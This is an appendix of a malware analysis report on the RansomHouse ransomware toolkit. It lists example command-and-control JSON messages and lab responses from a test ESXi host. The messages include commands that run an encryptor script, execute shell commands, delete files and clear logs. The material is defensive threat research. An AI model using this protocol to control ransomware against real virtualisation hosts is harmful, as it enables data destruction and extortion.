RansomHouse am See
By Pham Duy Phuc and Max Kersten, in collaboration with Noël Keijzer and Michaël Schrijver from Northwave
Appendix C - Example Command & Control requests
Info
Example c2 request:
{
"type": "info"
}
Example response:
{
"type": "info",
"id": "localhost+08:00:27:ac:4b:55",
"taskId": "(null)",
"taskReply": "completed",
"data":
{
"config":
{
"host":
{
"startIn": 0,
"pass": "undefined",
"command": "undefined",
"command": "",
"args": []
},
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"priority": 2,
"group": 0
}]
},
"status":
{
"errors": [],
"ip": "192.168.56.10",
"hostType": 1,
"progress": -1,
"startsIn": -1,
"runIterations": 1,
"currentRunIteration": 1,
"passchange": "",
"dropsess": false,
"welcomeset": false,
"rmlogs": false,
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"datastoreMountPoint": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",
"datastoreName": "datastore1",
"datastoreSize": "1.5G",
"done": 0,
"total": 3,
"processId": "",
"online": false,
"errors": [],
"files":
[{
"name": "test-flat.vmdk",
"state": 0
}, {
"Name": "test.vmdk",
"state": 0
}, {
"name": "test.vmsd",
"state": 0
}]
}]
}
}
}
Config
Example c2 request:
{
"type": "config",
"config":
{
"host":
{
"startIn": 0,
"pass": "undefined",
"command": "undefined",
"command": "",
"args": []
}
}
}
Exec
Example c2 request:
{
"type": "exec",
"config":
{
"host":
{
"command": "/tmp/encrypter.sh"
}
}
}
Run
Example c2 request:
{
"type": "run",
"config":
{
"host":
{
"command": "uname -a"
}
}
}
Example c2 response:
{
"type": "info",
"id": "localhost+08:00:27:ac:4b:55",
"taskId": "(null)",
"taskReply": "completed",
"data":
{
"config":
{
"host":
{
"command": "uname -a",
"startIn": 0,
"pass": "undefined",
"command": "",
"args": []
},
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"priority": 2,
"group": 0
}]
},
"status":
{
"progress": -1,
"runIterations": 1,
"currentRunIteration": 1,
"dropsess": false,
"welcomeset": false,
"errors":
[{
"step": "",
"desc":
"VMkernel localhost 6.7.0 #1 SMP Release build-15160138 Nov 22 2019 20:49:31 x86_64 x86_64 x86_64 ESXi\n"
}],
"Ip": "192.168.56.10",
"hostType": 1,
"startsIn": -1,
"passchange": "",
"rmlogs": false,
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"datastoreMountPoint":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",
"datastoreName": "datastore1",
"datastoreSize": "1.5G",
"done": 0,
"total": 3,
"processId": "",
"online": false,
"errors": [],
"files":
[{
"name": "test-flat.vmdk",
"state": 0
}, {
"name": "test.vmdk",
"state": 0
}, {
"name": "test.vmsd",
"state": 0
}]
}]
}
}
}
Remove
Example c2 request:
{
"type": "remove",
"args": ["/tmp/test"]
}
Abort
Example c2 request:
{
"type": "abort"
}
Abort_f
Example c2 request:
{
"type": "abort_f"
}
Quit
Example c2 request:
{
"type": "quit"
}
Welcome
Example c2 request:
{
"type": "welcome",
"config":
{
"host":
{
"welcomeMsg": NEW-WELCOME-MESSAGE
}
}
}